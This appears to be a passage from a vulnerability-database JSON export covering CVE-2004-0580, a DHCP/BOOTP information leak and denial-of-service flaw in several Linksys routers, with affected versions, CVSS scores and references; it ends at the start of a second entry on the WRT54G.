"trust": 1.6,
"vendor": "linksys",
"version": "1.40.2"
},
{
"model": "wap55ag",
"scope": "eq",
"trust": 1.3,
"vendor": "linksys",
"version": "1.0.7"
},
{
"model": "befvp41",
"scope": "eq",
"trust": 1.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "befvp41",
"scope": "eq",
"trust": 1.3,
"vendor": "linksys",
"version": "1.40.4"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 1.3,
"vendor": "linksys",
"version": "1.45.3"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 1.3,
"vendor": "linksys",
"version": "1.44.3"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 1.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 1.3,
"vendor": "linksys",
"version": "1.43.4"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 1.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 1.3,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 1.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "befsr81",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "befsru31",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.40.2"
},
{
"model": "befsru31",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "befsru31",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "befvp41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.41"
},
{
"model": "befn2ps4",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.38.5"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.45.7"
},
{
"model": "befsr81",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "2.42.7.1"
},
{
"model": "befsru31",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "befvp41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.40.3f"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.37"
},
{
"model": "rv082",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "2.00.8"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.35"
},
{
"model": "befsru31",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.41"
},
{
"model": "befsru31",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "befsr41w",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "befsr81",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "2.44"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.39"
},
{
"model": "befvp41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.39.64"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.40.2"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "befsru31",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "befcmu10",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.36"
},
{
"model": "befcmu10",
"scope": null,
"trust": 0.9,
"vendor": "linksys",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.6,
"vendor": "none",
"version": null
},
{
"model": "befn2ps4",
"scope": null,
"trust": 0.6,
"vendor": "linksys",
"version": null
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "wpc300n wireless-n notebook adapter",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "-4.100.15.5"
},
{
"model": "rv082",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "etherfast befvp41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.39.64"
},
{
"model": "etherfast befvp41 router",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.41"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40.2"
},
{
"model": "etherfast befsr81 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "2.44"
},
{
"model": "etherfast befsr81 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "2.42.7"
},
{
"model": "etherfast befsr81 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "2.42.7.1"
},
{
"model": "etherfast befsr81 router",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.45.7"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.41"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40.2"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.39"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.38"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.37"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.36"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.35"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.38.5"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.41"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40.2"
},
{
"model": "etherfast befn2ps4 router",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "befvp41 .3f",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40"
},
{
"model": "befsr81",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "befsr41w",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "etherfast befsr41 router",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "1.05.00"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2004-1417"
},
{
"db": "BID",
"id": "10329"
},
{
"db": "NVD",
"id": "CVE-2004-0580"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-030"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr11:1.44:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befvp41:1.40.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befcmu10:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr11:1.40.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wap55ag:1.0.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr81:2.42.7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr81:2.44:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr11:1.42.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befvp41:1.39.64:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befvp41:1.42.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsru31:1.42.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41w:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.40.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.45.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsru31:1.41:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.42.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsx41:1.43.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr11:1.43:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsru31:1.43:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.42.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.44:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.36:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsx41:1.44.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsx41:1.42.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsx41:1.43:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr11:1.42.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsru31:1.44:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befvp41:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.35:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr11:1.43.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsru31:1.42.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsx41:1.43.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.41:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsx41:1.44:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsx41:1.45.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.43:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befn2ps4:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befvp41:1.40.3f:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befn2ps4:1.42.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:rv082:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:1.42.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:2.00.8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.38.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsru31:1.40.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.39:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsru31:1.43.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr11:1.41:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr81:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.37:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.43.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0580"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jon Hart\u203b warchild@spoofed.org",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200408-030"
}
],
"trust": 0.6
},
"cve": "CVE-2004-0580",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-9010",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2004-0580",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200408-030",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-9010",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9010"
},
{
"db": "NVD",
"id": "CVE-2004-0580"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-030"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "DHCP on Linksys BEFSR11, BEFSR41, BEFSR81, and BEFSRU31 Cable/DSL Routers, firmware version 1.45.7, does not properly clear previously used buffer contents in a BOOTP reply packet, which allows remote attackers to obtain sensitive information. Linksys has a variety of network equipment product lines. \n\n\u00a0Multiple Linksys devices have problems processing DHCP messages. Remote attackers can use this vulnerability to obtain sensitive information or conduct denial of service attacks on the device. \n\n\u00a0The built-in DHCP server of these devices has a security vulnerability. The DHCP server of these devices incorrectly processes BOOTP packets. When returning a BOOTP response, it fills some of the information in the memory into the BOOTP field, so the attacker can gain sensitivity by sniffing network communications. Information can also lead to a denial of service attack on the device by an attacker. When attempting to exploit this issue, it has been reported that a denial of service condition may occur, stopping legitimate users from using the device",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0580"
},
{
"db": "CNVD",
"id": "CNVD-2004-1417"
},
{
"db": "BID",
"id": "10329"
},
{
"db": "VULHUB",
"id": "VHN-9010"
}
],
"trust": 1.8
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-9010",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9010"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2004-0580",
"trust": 2.6
},
{
"db": "BID",
"id": "10329",
"trust": 2.0
},
{
"db": "OSVDB",
"id": "6325",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1010288",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "11606",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-200408-030",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2004-1417",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040607 LINKSYS BEFSR41 DHCP VULNERABILITY SERVER LEAKS NETWORK DATA",
"trust": 0.6
},
{
"db": "XF",
"id": "16142",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-77851",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "24115",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-9010",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2004-1417"
},
{
"db": "VULHUB",
"id": "VHN-9010"
},
{
"db": "BID",
"id": "10329"
},
{
"db": "NVD",
"id": "CVE-2004-0580"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-030"
}
]
},
"id": "VAR-200408-0079",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-9010"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T13:31:00.424000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0580"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/10329"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/6325"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/alerts/2004/may/1010288.html"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/11606"
},
{
"trust": 1.6,
"url": "http://linksys.custhelp.com/cgi-bin/linksys.cfg/php/enduser/std_adp.php?p_faqid=832\u0026p_%20%5ccreated=1086294093\u0026p_sid=pu1x1idh\u0026p_lva=\u0026p_sp=cf9zcmnopszwx3nvcnrfynk9jnbfz3jpzhnvcnq9%20%5cjnbfcm93x2nudd02ntqmcf9wywdlpte%2a\u0026p_li="
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16142"
},
{
"trust": 1.0,
"url": "http://marc.info/?l=bugtraq\u0026m=108662876129301\u0026w=2"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/16142"
},
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=108662876129301\u0026w=2"
},
{
"trust": 0.3,
"url": "http://linksys.custhelp.com/cgi-bin/linksys.cfg/php/enduser/std_adp.php?p_faqid=832\u0026p_created=1086294093\u0026p_sid=pu1x1idh\u0026p_lva=\u0026p_sp=cf9zcmnopszwx3nvcnrfynk9jnbfz3jpzhnvcnq9jnbfcm93x2nudd02ntqmcf9wywdl"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/products/group.asp?grid=23"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/"
},
{
"trust": 0.3,
"url": "/archive/1/365319"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=108662876129301\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://linksys.custhelp.com/cgi-bin/linksys.cfg/php/enduser/std_adp.php?p_faqid=832\u0026amp;p_%20%5ccreated=1086294093\u0026amp;p_sid=pu1x1idh\u0026amp;p_lva=\u0026amp;p_sp=cf9zcmnopszwx3nvcnrfynk9jnbfz3jpzhnvcnq9%20%5cjnbfcm93x2nudd02ntqmcf9wywdlpte%2a\u0026amp;p_li="
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9010"
},
{
"db": "BID",
"id": "10329"
},
{
"db": "NVD",
"id": "CVE-2004-0580"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-030"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2004-1417"
},
{
"db": "VULHUB",
"id": "VHN-9010"
},
{
"db": "BID",
"id": "10329"
},
{
"db": "NVD",
"id": "CVE-2004-0580"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-030"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-05-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2004-1417"
},
{
"date": "2004-08-06T00:00:00",
"db": "VULHUB",
"id": "VHN-9010"
},
{
"date": "2004-05-13T00:00:00",
"db": "BID",
"id": "10329"
},
{
"date": "2004-08-06T04:00:00",
"db": "NVD",
"id": "CVE-2004-0580"
},
{
"date": "2004-05-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200408-030"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-05-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2004-1417"
},
{
"date": "2018-08-13T00:00:00",
"db": "VULHUB",
"id": "VHN-9010"
},
{
"date": "2015-03-19T09:44:00",
"db": "BID",
"id": "10329"
},
{
"date": "2023-11-07T01:56:43.640000",
"db": "NVD",
"id": "CVE-2004-0580"
},
{
"date": "2005-10-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200408-030"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200408-030"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple Linksys Device DHCP Information Leaks and Denial of Service Vulnerabilities",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2004-1417"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "10329"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-030"
}
],
"trust": 0.9
}
}
VAR-200509-0095
Vulnerability from variot - Updated: 2023-12-18 13:26ezconfig.asp in Linksys WRT54G router 3.01.03, 3.03.6, non-default configurations of 2.04.4, and possibly other versions, does not use an authentication initialization function, which allows remote attackers to obtain encrypted configuration information and, if the key is known, modify the configuration. WRT54G v1.0 is prone to a remote security vulnerability. Linksys WRT54G is a Cisco wireless router
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
